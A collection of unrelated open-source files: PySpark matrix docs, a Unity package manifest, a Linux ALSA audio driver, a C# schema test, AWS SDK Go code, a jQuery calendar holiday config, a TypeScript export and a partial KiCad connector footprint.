docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.BlockMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg import Matrices from pyspark.mllib.linalg.distributed import BlockMatrix # Create an RDD of sub-matrix blocks. blocks = sc.parallelize([((0, 0), Matrices.dense(3, 2, [1, 2, 3, 4, 5, 6])), ((1, 0), Matrices.dense(3, 2, [7, 8, 9, 10, 11, 12]))]) # Create a BlockMatrix from an RDD of sub-matrix blocks. mat = BlockMatrix(blocks, 3, 2) # Get its size. m = mat.numRows() # 6 n = mat.numCols() # 2 # Get the blocks as an RDD of sub-matrix blocks. blocksRDD = mat.blocks # Convert to a LocalMatrix. localMat = mat.toLocalMatrix() # Convert to an IndexedRowMatrix. indexedRowMat = mat.toIndexedRowMatrix() # Convert to a CoordinateMatrix. coordinateMat = mat.toCoordinateMatrix() {% endhighlight %} </div> </div>
{ "pile_set_name": "Github" }
{ "dependencies": { "com.unity.2d.sprite": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.addressables": { "version": "1.8.4", "depth": 0, "source": "registry", "dependencies": { "com.unity.scriptablebuildpipeline": "1.7.3", "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.unitywebrequestassetbundle": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.build-report-inspector": { "version": "0.2.2-preview", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.burst": { "version": "1.2.3", "depth": 0, "source": "registry", "dependencies": { "com.unity.mathematics": "1.1.0" }, "url": "https://packages.unity.com" }, "com.unity.cinemachine": { "version": "2.6.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.editorcoroutines": { "version": "1.0.0", "depth": 1, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ext.nunit": { "version": "1.0.0", "depth": 2, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ide.rider": { "version": "2.0.5", "depth": 0, "source": "registry", "dependencies": { "com.unity.test-framework": "1.1.1" }, "url": "https://packages.unity.com" }, "com.unity.ide.visualstudio": { "version": "2.0.1", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ide.vscode": { "version": "1.2.1", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.inputsystem": { "version": "1.0.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.mathematics": { "version": "1.1.0", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.memoryprofiler": { "version": "0.2.4-preview.1", "depth": 0, "source": "registry", "dependencies": { "com.unity.editorcoroutines": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.render-pipelines.core": { "version": "9.0.0-preview.38", "depth": 1, "source": "registry", "dependencies": { "com.unity.ugui": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.render-pipelines.universal": { "version": "9.0.0-preview.35", "depth": 0, "source": "registry", "dependencies": { "com.unity.mathematics": "1.1.0", "com.unity.burst": "1.2.3", "com.unity.render-pipelines.core": "9.0.0-preview.38", "com.unity.shadergraph": "9.0.0-preview.34" }, "url": "https://packages.unity.com" }, "com.unity.scriptablebuildpipeline": { "version": "1.7.3", "depth": 1, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.searcher": { "version": "4.2.0", "depth": 2, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.shadergraph": { "version": "9.0.0-preview.34", "depth": 1, "source": "registry", "dependencies": { "com.unity.render-pipelines.core": "9.0.0-preview.38", "com.unity.searcher": "4.2.0" }, "url": "https://packages.unity.com" }, "com.unity.terrain-tools": { "version": "3.0.1-preview", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.test-framework": { "version": "1.1.14", "depth": 1, "source": "registry", "dependencies": { "com.unity.ext.nunit": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.textmeshpro": { "version": "3.0.0-preview.14", "depth": 0, "source": "registry", "dependencies": { "com.unity.ugui": "1.0.0" }, "url": "https://packages.unity.com" }, "com.unity.timeline": { "version": "1.3.4", "depth": 0, "source": "registry", "dependencies": {}, "url": "https://packages.unity.com" }, "com.unity.ugui": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.ui": "1.0.0" } }, "com.verasl.water-system": { "version": "file:com.verasl.water-system", "depth": 0, "source": "embedded", "dependencies": { "com.unity.mathematics": "1.1.0", "com.unity.burst": "1.2.3", "com.unity.render-pipelines.universal": "7.4.1" } }, "net.peeweek.gameplay-ingredients": { "version": "https://github.com/peeweek/net.peeweek.gameplay-ingredients.git#2019.3.0", "depth": 0, "source": "git", "dependencies": { "com.unity.cinemachine": "2.3.4" }, "hash": "604801ada543d20bc302f6310305fe29016d23d2" }, "com.unity.modules.ai": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.androidjni": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.animation": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.assetbundle": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.audio": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.cloth": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0" } }, "com.unity.modules.director": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.audio": "1.0.0", "com.unity.modules.animation": "1.0.0" } }, "com.unity.modules.imageconversion": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.imgui": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.jsonserialize": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.particlesystem": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.physics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.physics2d": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.screencapture": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.subsystems": { "version": "1.0.0", "depth": 1, "source": "builtin", "dependencies": { "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.terrain": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.terrainphysics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0", "com.unity.modules.terrain": "1.0.0" } }, "com.unity.modules.ui": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.uielements": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.ui": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.uielementsnative": "1.0.0" } }, "com.unity.modules.uielementsnative": { "version": "1.0.0", "depth": 1, "source": "builtin", "dependencies": { "com.unity.modules.ui": "1.0.0", "com.unity.modules.imgui": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.umbra": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.unityanalytics": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0" } }, "com.unity.modules.unitywebrequest": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.unitywebrequestassetbundle": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0" } }, "com.unity.modules.unitywebrequestaudio": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.audio": "1.0.0" } }, "com.unity.modules.unitywebrequesttexture": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.unitywebrequestwww": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.unitywebrequest": "1.0.0", "com.unity.modules.unitywebrequestassetbundle": "1.0.0", "com.unity.modules.unitywebrequestaudio": "1.0.0", "com.unity.modules.audio": "1.0.0", "com.unity.modules.assetbundle": "1.0.0", "com.unity.modules.imageconversion": "1.0.0" } }, "com.unity.modules.video": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.audio": "1.0.0", "com.unity.modules.ui": "1.0.0", "com.unity.modules.unitywebrequest": "1.0.0" } }, "com.unity.modules.vr": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.physics": "1.0.0", "com.unity.modules.xr": "1.0.0" } }, "com.unity.modules.wind": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": {} }, "com.unity.modules.xr": { "version": "1.0.0", "depth": 0, "source": "builtin", "dependencies": { "com.unity.modules.physics": "1.0.0", "com.unity.modules.jsonserialize": "1.0.0", "com.unity.modules.subsystems": "1.0.0" } } } }
{ "pile_set_name": "Github" }
/* * snappercl15.c -- SoC audio for Bluewater Systems Snapper CL15 module * * Copyright (C) 2008 Bluewater Systems Ltd * Author: Ryan Mallon * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * */ #include <linux/platform_device.h> #include <linux/module.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/soc.h> #include <asm/mach-types.h> #include <mach/hardware.h> #include "../codecs/tlv320aic23.h" #define CODEC_CLOCK 5644800 static int snappercl15_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params) { struct snd_soc_pcm_runtime *rtd = substream->private_data; struct snd_soc_dai *codec_dai = rtd->codec_dai; struct snd_soc_dai *cpu_dai = rtd->cpu_dai; int err; err = snd_soc_dai_set_sysclk(codec_dai, 0, CODEC_CLOCK, SND_SOC_CLOCK_IN); if (err) return err; err = snd_soc_dai_set_sysclk(cpu_dai, 0, CODEC_CLOCK, SND_SOC_CLOCK_OUT); if (err) return err; return 0; } static struct snd_soc_ops snappercl15_ops = { .hw_params = snappercl15_hw_params, }; static const struct snd_soc_dapm_widget tlv320aic23_dapm_widgets[] = { SND_SOC_DAPM_HP("Headphone Jack", NULL), SND_SOC_DAPM_LINE("Line In", NULL), SND_SOC_DAPM_MIC("Mic Jack", NULL), }; static const struct snd_soc_dapm_route audio_map[] = { {"Headphone Jack", NULL, "LHPOUT"}, {"Headphone Jack", NULL, "RHPOUT"}, {"LLINEIN", NULL, "Line In"}, {"RLINEIN", NULL, "Line In"}, {"MICIN", NULL, "Mic Jack"}, }; static struct snd_soc_dai_link snappercl15_dai = { .name = "tlv320aic23", .stream_name = "AIC23", .cpu_dai_name = "ep93xx-i2s", .codec_dai_name = "tlv320aic23-hifi", .codec_name = "tlv320aic23-codec.0-001a", .platform_name = "ep93xx-i2s", .dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_IF | SND_SOC_DAIFMT_CBS_CFS, .ops = &snappercl15_ops, }; static struct snd_soc_card snd_soc_snappercl15 = { .name = "Snapper CL15", .owner = THIS_MODULE, .dai_link = &snappercl15_dai, .num_links = 1, .dapm_widgets = tlv320aic23_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(tlv320aic23_dapm_widgets), .dapm_routes = audio_map, .num_dapm_routes = ARRAY_SIZE(audio_map), }; static int snappercl15_probe(struct platform_device *pdev) { struct snd_soc_card *card = &snd_soc_snappercl15; int ret; ret = ep93xx_i2s_acquire(); if (ret) return ret; card->dev = &pdev->dev; ret = snd_soc_register_card(card); if (ret) { dev_err(&pdev->dev, "snd_soc_register_card() failed: %d\n", ret); ep93xx_i2s_release(); } return ret; } static int snappercl15_remove(struct platform_device *pdev) { struct snd_soc_card *card = platform_get_drvdata(pdev); snd_soc_unregister_card(card); ep93xx_i2s_release(); return 0; } static struct platform_driver snappercl15_driver = { .driver = { .name = "snappercl15-audio", }, .probe = snappercl15_probe, .remove = snappercl15_remove, }; module_platform_driver(snappercl15_driver); MODULE_AUTHOR("Ryan Mallon"); MODULE_DESCRIPTION("ALSA SoC Snapper CL15"); MODULE_LICENSE("GPL"); MODULE_ALIAS("platform:snappercl15-audio");
{ "pile_set_name": "Github" }
using DatabaseSchemaReader.Conversion; using DatabaseSchemaReader.DataSchema; using Microsoft.VisualStudio.TestTools.UnitTesting; namespace DatabaseSchemaReaderTest.DataSchema { [TestClass] public class DatabaseSchemaTest { [TestMethod] public void TestSqlTypeConstructor() { var schema = new DatabaseSchema(null, SqlType.SqlServer); //translated to correct provider name Assert.AreEqual("System.Data.SqlClient", schema.Provider); //it round trips back to SqlType Assert.AreEqual(SqlType.SqlServer, ProviderToSqlType.Convert(schema.Provider)); //we'll check all the others in same test schema = new DatabaseSchema(null, SqlType.Oracle); Assert.AreEqual("System.Data.OracleClient", schema.Provider); Assert.AreEqual(SqlType.Oracle, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.MySql); Assert.AreEqual("MySql.Data.MySqlClient", schema.Provider); Assert.AreEqual(SqlType.MySql, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.SQLite); Assert.AreEqual("System.Data.SQLite", schema.Provider); Assert.AreEqual(SqlType.SQLite, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.SqlServerCe); Assert.AreEqual("System.Data.SqlServerCe.4.0", schema.Provider); Assert.AreEqual(SqlType.SqlServerCe, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.PostgreSql); Assert.AreEqual("Npgsql", schema.Provider); Assert.AreEqual(SqlType.PostgreSql, ProviderToSqlType.Convert(schema.Provider)); schema = new DatabaseSchema(null, SqlType.Db2); Assert.AreEqual("IBM.Data.DB2", schema.Provider); Assert.AreEqual(SqlType.Db2, ProviderToSqlType.Convert(schema.Provider)); } [TestMethod] public void TestInitializeCollections() { var schema = new DatabaseSchema(null, null); Assert.IsNotNull(schema.Tables); Assert.IsNotNull(schema.Views); Assert.IsNotNull(schema.Users); Assert.IsNotNull(schema.StoredProcedures); Assert.IsNotNull(schema.Sequences); Assert.IsNotNull(schema.Packages); Assert.IsNotNull(schema.Functions); Assert.IsNotNull(schema.DataTypes); } [TestMethod] public void TestFindByName() { var schema = new DatabaseSchema(null, null); schema.AddTable("Orders") .AddTable("Products"); var table = schema.FindTableByName("products"); Assert.IsNotNull(table); Assert.AreEqual("Products", table.Name); } } }
{ "pile_set_name": "Github" }
// Code generated by smithy-go-codegen DO NOT EDIT. package apigateway import ( "context" awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware" "github.com/aws/aws-sdk-go-v2/aws/retry" "github.com/aws/aws-sdk-go-v2/aws/signer/v4" "github.com/aws/aws-sdk-go-v2/service/apigateway/types" smithy "github.com/awslabs/smithy-go" "github.com/awslabs/smithy-go/middleware" smithyhttp "github.com/awslabs/smithy-go/transport/http" ) // Gets the VpcLinks () collection under the caller's account in a selected region. func (c *Client) GetVpcLinks(ctx context.Context, params *GetVpcLinksInput, optFns ...func(*Options)) (*GetVpcLinksOutput, error) { stack := middleware.NewStack("GetVpcLinks", smithyhttp.NewStackRequest) options := c.options.Copy() for _, fn := range optFns { fn(&options) } addawsRestjson1_serdeOpGetVpcLinksMiddlewares(stack) awsmiddleware.AddRequestInvocationIDMiddleware(stack) smithyhttp.AddContentLengthMiddleware(stack) AddResolveEndpointMiddleware(stack, options) v4.AddComputePayloadSHA256Middleware(stack) retry.AddRetryMiddlewares(stack, options) addHTTPSignerV4Middleware(stack, options) awsmiddleware.AddAttemptClockSkewMiddleware(stack) addClientUserAgent(stack) smithyhttp.AddErrorCloseResponseBodyMiddleware(stack) smithyhttp.AddCloseResponseBodyMiddleware(stack) stack.Initialize.Add(newServiceMetadataMiddleware_opGetVpcLinks(options.Region), middleware.Before) addRequestIDRetrieverMiddleware(stack) addResponseErrorMiddleware(stack) addAcceptHeader(stack) for _, fn := range options.APIOptions { if err := fn(stack); err != nil { return nil, err } } handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack) result, metadata, err := handler.Handle(ctx, params) if err != nil { return nil, &smithy.OperationError{ ServiceID: ServiceID, OperationName: "GetVpcLinks", Err: err, } } out := result.(*GetVpcLinksOutput) out.ResultMetadata = metadata return out, nil } // Gets the VpcLinks () collection under the caller's account in a selected region. type GetVpcLinksInput struct { Template *bool TemplateSkipList []*string Title *string // The current pagination position in the paged result set. Position *string Name *string // The maximum number of returned results per page. The default value is 25 and the // maximum value is 500. Limit *int32 } // The collection of VPC links under the caller's account in a region. Getting // Started with Private Integrations // (https://docs.aws.amazon.com/apigateway/latest/developerguide/getting-started-with-private-integration.html), // Set up Private Integrations // (https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html) // </div> type GetVpcLinksOutput struct { // The current page of elements from this collection. Items []*types.VpcLink // The current pagination position in the paged result set. Position *string // Metadata pertaining to the operation's result. ResultMetadata middleware.Metadata } func addawsRestjson1_serdeOpGetVpcLinksMiddlewares(stack *middleware.Stack) { stack.Serialize.Add(&awsRestjson1_serializeOpGetVpcLinks{}, middleware.After) stack.Deserialize.Add(&awsRestjson1_deserializeOpGetVpcLinks{}, middleware.After) } func newServiceMetadataMiddleware_opGetVpcLinks(region string) awsmiddleware.RegisterServiceMetadata { return awsmiddleware.RegisterServiceMetadata{ Region: region, ServiceID: ServiceID, SigningName: "apigateway", OperationName: "GetVpcLinks", } }
{ "pile_set_name": "Github" }
/**! * jQuery cxCalendar Multi-Language Configure * @date 2017-7-7 * @author ciaoca * @email [email protected] * @site https://github.com/ciaoca/cxCalendar */ (function(factory) { if (typeof define === 'function' && define.amd) { define(['jquery', 'cxCalendar'], factory); } else { factory(jQuery); }; }(function($) { $.extend($.cxCalendar.languages, { // Default // 默认为中文,可以在此设定替换掉原默认语言 // 'default': { // monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], // weekList: ['日', '一', '二', '三', '四', '五', '六'], // holiday: [] // }, // English 'en': { monthList: ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'], weekList: ['Sun', 'Mon', 'Tur', 'Wed', 'Thu', 'Fri', 'Sat'], holiday: [] }, // Japanese 'ja': { monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], weekList: ['日', '月', '火', '水', '木', '金', '土'], holiday: [] }, // Chinese 'zh-cn': { monthList: ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'], weekList: ['日', '一', '二', '三', '四', '五', '六'], holiday: [ {day: 'M1-1', name: '元旦'}, {day: 'M2-14', name: '情人节'}, {day: 'M3-5', name: '学雷锋纪念日'}, {day: 'M3-8', name: '妇女节'}, {day: 'M3-12', name: '植树节'}, {day: 'M3-14', name: '白色情人节'}, {day: 'M3-15', name: '消费者权益日'}, {day: 'M4-1', name: '愚人节'}, {day: 'M5-1', name: '劳动节'}, {day: 'M5-4', name: '青年节'}, {day: 'M6-1', name: '儿童节'}, {day: 'M8-1', name: '建党节'}, {day: 'M8-1', name: '建军节'}, {day: 'M9-10', name: '教师节'}, {day: 'M10-1', name: '国庆节'}, {day: 'M11-1', name: '万圣节'}, {day: 'M12-25', name: '圣诞节'}, {day: 'D2017-1-5', name: '腊八节'}, {day: 'D2017-1-20', name: '大寒'}, {day: 'D2017-1-27', name: '除夕'}, {day: 'D2017-1-28', name: '春节'}, {day: 'D2017-2-3', name: '立春'}, {day: 'D2017-2-11', name: '元宵节'}, {day: 'D2017-2-18', name: '雨水'}, {day: 'D2017-3-5', name: '惊蛰'}, {day: 'D2017-3-20', name: '春分'}, {day: 'D2017-4-4', name: '清明'}, {day: 'D2017-4-20', name: '谷雨'}, {day: 'D2017-5-5', name: '立夏'}, {day: 'D2017-5-14', name: '母亲节'}, {day: 'D2017-5-21', name: '小满'}, {day: 'D2017-5-30', name: '端午节'}, {day: 'D2017-6-5', name: '芒种'}, {day: 'D2017-6-18', name: '父亲节'}, {day: 'D2017-6-21', name: '夏至'}, {day: 'D2017-7-14', name: '小暑'}, {day: 'D2017-7-23', name: '大暑'}, {day: 'D2017-8-7', name: '立秋'}, {day: 'D2017-8-23', name: '处暑'}, {day: 'D2017-8-28', name: '七夕'}, {day: 'D2017-9-5', name: '中元节'}, {day: 'D2017-9-7', name: '白露'}, {day: 'D2017-9-23', name: '秋分'}, {day: 'D2017-10-4', name: '中秋节'}, {day: 'D2017-10-8', name: '寒露'}, {day: 'D2017-10-23', name: '霜降'}, {day: 'D2017-10-28', name: '重阳节'}, {day: 'D2017-11-7', name: '立冬'}, {day: 'D2017-11-22', name: '小雪'}, {day: 'D2017-12-7', name: '大雪'}, {day: 'D2017-12-21', name: '冬至'}, {day: 'D2018-1-5', name: '小寒'}, {day: 'D2018-1-20', name: '大寒'}, {day: 'D2018-1-24', name: '腊八节'}, {day: 'D2018-2-4', name: '立春'}, {day: 'D2018-2-15', name: '除夕'}, {day: 'D2018-2-16', name: '春节'}, {day: 'D2018-2-19', name: '雨水'}, {day: 'D2018-3-2', name: '元宵节'}, {day: 'D2018-3-5', name: '惊蛰'}, {day: 'D2018-3-21', name: '春分'}, {day: 'D2018-4-5', name: '清明'}, {day: 'D2018-4-20', name: '谷雨'}, {day: 'D2018-5-5', name: '立夏'}, {day: 'D2018-5-13', name: '母情节'}, {day: 'D2018-5-21', name: '小满'}, {day: 'D2018-6-6', name: '芒种'}, {day: 'D2018-6-17', name: '父亲节'}, {day: 'D2018-6-18', name: '端午节'}, {day: 'D2018-6-21', name: '夏至'}, {day: 'D2018-7-7', name: '小暑'}, {day: 'D2018-7-23', name: '大暑'}, {day: 'D2018-8-7', name: '立秋'}, {day: 'D2018-8-17', name: '七夕节'}, {day: 'D2018-8-23', name: '处暑'}, {day: 'D2018-8-25', name: '中元节'}, {day: 'D2018-9-8', name: '白露'}, {day: 'D2018-9-23', name: '秋分'}, {day: 'D2018-9-24', name: '中秋节'}, {day: 'D2018-10-8', name: '寒露'}, {day: 'D2018-10-17', name: '重阳节'}, {day: 'D2018-10-23', name: '霜降'}, {day: 'D2018-11-7', name: '立冬'}, {day: 'D2018-11-22', name: '小雪'}, {day: 'D2018-12-7', name: '大雪'}, {day: 'D2018-12-22', name: '冬至'}, {day: 'D2019-1-5', name: '小寒'}, {day: 'D2019-1-13', name: '腊八节'}, {day: 'D2019-1-20', name: '大寒'}, {day: 'D2019-2-4', name: '除夕'}, {day: 'D2019-2-5', name: '春节'}, {day: 'D2019-2-19', name: '元宵节'}, {day: 'D2019-3-6', name: '惊蛰'}, {day: 'D2019-3-21', name: '春分'}, {day: 'D2019-4-5', name: '清明'}, {day: 'D2019-4-20', name: '谷雨'}, {day: 'D2019-5-6', name: '立夏'}, {day: 'D2019-5-12', name: '母亲节'}, {day: 'D2019-5-21', name: '小满'}, {day: 'D2019-6-6', name: '芒种'}, {day: 'D2019-6-7', name: '端午节'}, {day: 'D2019-6-16', name: '父亲节'}, {day: 'D2019-6-22', name: '夏至'}, {day: 'D2019-7-5', name: '小暑'}, {day: 'D2019-7-23', name: '大暑'}, {day: 'D2019-8-8', name: '立秋'}, {day: 'D2019-8-7', name: '七夕'}, {day: 'D2019-8-15', name: '中元节'}, {day: 'D2019-8-23', name: '处暑'}, {day: 'D2019-9-8', name: '白露'}, {day: 'D2019-9-13', name: '中秋节'}, {day: 'D2019-9-23', name: '秋分'}, {day: 'D2019-10-7', name: '重阳节'}, {day: 'D2019-10-8', name: '寒露'}, {day: 'D2019-10-24', name: '霜降'}, {day: 'D2019-11-8', name: '立冬'}, {day: 'D2019-11-22', name: '小雪'}, {day: 'D2019-12-7', name: '大雪'}, {day: 'D2019-12-22', name: '冬至'}, {day: 'D2020-1-2', name: '腊八节'}, {day: 'D2020-1-6', name: '小寒'}, {day: 'D2020-1-20', name: '大寒'}, {day: 'D2020-1-24', name: '除夕'}, {day: 'D2020-1-25', name: '春节'}, {day: 'D2020-2-4', name: '立春'}, {day: 'D2020-2-8', name: '元宵节'}, {day: 'D2020-2-19', name: '雨水'}, {day: 'D2020-3-5', name: '惊蛰'}, {day: 'D2020-3-20', name: '春分'}, {day: 'D2020-4-4', name: '清明'}, {day: 'D2020-4-19', name: '谷雨'}, {day: 'D2020-5-5', name: '立夏'}, {day: 'D2020-5-10', name: '母亲节'}, {day: 'D2020-5-20', name: '小满'}, {day: 'D2020-6-5', name: '芒种'}, {day: 'D2020-6-21', name: '父亲节'}, {day: 'D2020-6-25', name: '端午节'}, {day: 'D2020-7-7', name: '小暑'}, {day: 'D2020-7-22', name: '大暑'}, {day: 'D2020-8-7', name: '立秋'}, {day: 'D2020-8-23', name: '处暑'}, {day: 'D2020-8-25', name: '七夕'}, {day: 'D2020-9-2', name: '中元节'}, {day: 'D2020-9-7', name: '白露'}, {day: 'D2020-9-22', name: '秋分'}, {day: 'D2020-10-1', name: '中秋节'}, {day: 'D2020-10-8', name: '寒露'}, {day: 'D2020-10-23', name: '霜降'}, {day: 'D2020-10-25', name: '重阳节'}, {day: 'D2020-11-7', name: '立冬'}, {day: 'D2020-11-22', name: '小雪'}, {day: 'D2020-12-6', name: '大雪'}, {day: 'D2020-12-21', name: '冬至'} ] } }); }));
{ "pile_set_name": "Github" }
// @ts-ignore import Pagination from './components/Pagination.vue'; // @ts-ignore import SimplePagination from './components/SimplePagination.vue'; // @ts-ignore import Comment from './components/Comment.vue'; export { Pagination, SimplePagination, Comment };
{ "pile_set_name": "Github" }
(module IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical (layer F.Cu) (tedit 5EAC9A07) (descr "Through hole IDC header, 2x32, 2.54mm pitch, DIN 41651 / IEC 60603-13, double rows, 9.5mm latches, mounting holes, https://docs.google.com/spreadsheets/d/16SsEcesNF15N3Lb4niX7dcUr-NY5_MFPQhobNuNppn4/edit#gid=0") (tags "Through hole vertical IDC header THT 2x32 2.54mm double row") (fp_text reference REF** (at 1.27 -21.47) (layer F.SilkS) (effects (font (size 1 1) (thickness 0.15))) ) (fp_text value IDC-Header_2x32-1MP_P2.54mm_Latch9.5mm_Vertical (at 1.27 100.21) (layer F.Fab) (effects (font (size 1 1) (thickness 0.15))) ) (fp_line (start -3.13 -9.97) (end -2.13 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start -2.13 -10.97) (end 5.67 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start 5.67 -10.97) (end 5.67 89.71) (layer F.Fab) (width 0.1)) (fp_line (start 5.67 89.71) (end -3.13 89.71) (layer F.Fab) (width 0.1)) (fp_line (start -3.13 89.71) (end -3.13 -9.97) (layer F.Fab) (width 0.1)) (fp_line (start -3.13 37.32) (end -1.93 37.32) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 37.32) (end -1.93 -3.92) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 -3.92) (end 4.47 -3.92) (layer F.Fab) (width 0.1)) (fp_line (start 4.47 -3.92) (end 4.47 82.66) (layer F.Fab) (width 0.1)) (fp_line (start 4.47 82.66) (end -1.93 82.66) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 82.66) (end -1.93 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 41.42) (end -1.93 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -1.93 41.42) (end -3.13 41.42) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 -10.97) (end -0.93 -20.47) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 -20.47) (end 3.47 -20.47) (layer F.Fab) (width 0.1)) (fp_line (start 3.47 -20.47) (end 3.47 -10.97) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 89.71) (end -0.93 99.21) (layer F.Fab) (width 0.1)) (fp_line (start -0.93 99.21) (end 3.47 99.21) (layer F.Fab) (width 0.1)) (fp_line (start 3.47 99.21) (end 3.47 89.71) (layer F.Fab) (width 0.1)) (fp_line (start 4.91 -11.08) (end 5.78 -11.08) (layer F.SilkS) (width 0.12)) (fp_line (start 5.78 -11.08) (end 5.78 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start 5.78 89.82) (end 4.91 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -2.87 -11.08) (end -3.24 -11.08) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 -11.08) (end -3.24 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 89.82) (end -2.87 89.82) (layer F.SilkS) (width 0.12)) (fp_line (start -3.24 37.32) (end -1.93 37.32) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 37.32) (end -1.93 -3.92) (layer F.SilkS) (width 0.12)) (fp_line (start -1.93 -3.92) (end 4.47 -3.92) (layer F.SilkS) (width 0.12)) (fp_line (start 4.47 -3.92) (end 4.47 82.66) (layer F.SilkS) (width 0.12)) 